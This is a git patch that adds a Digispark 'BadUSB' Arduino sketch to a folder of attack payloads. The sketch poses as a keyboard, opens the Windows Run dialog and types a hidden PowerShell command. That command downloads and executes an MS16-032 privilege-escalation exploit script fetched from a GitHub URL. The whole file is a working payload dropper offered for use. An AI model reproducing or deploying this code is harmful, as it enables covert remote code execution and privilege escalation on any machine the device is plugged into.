From b81336814de11d134911e40448447b0d91364579 Mon Sep 17 00:00:00 2001
From: Muhammad Talha Khan <MTK911@users.noreply.github.com>
Date: Sun, 3 May 2020 13:46:10 +0500
Subject: [PATCH] Create Remote_PS_Exec.ino

---
 payloads/PayLoad Dropper/Remote_PS_Exec.ino | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100644 payloads/PayLoad Dropper/Remote_PS_Exec.ino

diff --git a/payloads/PayLoad Dropper/Remote_PS_Exec.ino b/payloads/PayLoad Dropper/Remote_PS_Exec.ino
new file mode 100644
index 0000000..f77ace5
--- /dev/null
+++ b/payloads/PayLoad Dropper/Remote_PS_Exec.ino	
@@ -0,0 +1,17 @@
+#include "DigiKeyboard.h"
+void setup() {
+  pinMode(1, OUTPUT); //LED on Model A 
+}
+void loop() {
+  DigiKeyboard.update();
+  DigiKeyboard.sendKeyStroke(0);
+  DigiKeyboard.delay(3000);
+  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run
+  DigiKeyboard.delay(500);
+  DigiKeyboard.println("powershell -windowstyle hidden -command IEX (iwr \"https://raw.githubusercontent.com/SecWiki/windows-kernel-exploits/master/MS16-032/MS16-032.ps1\")"); //Payload Dropper
+  DigiKeyboard.delay(500);
+  digitalWrite(1, HIGH); //turn on led when program finishes
+  DigiKeyboard.delay(90000);
+  digitalWrite(1, LOW); 
+  DigiKeyboard.delay(5000);
+}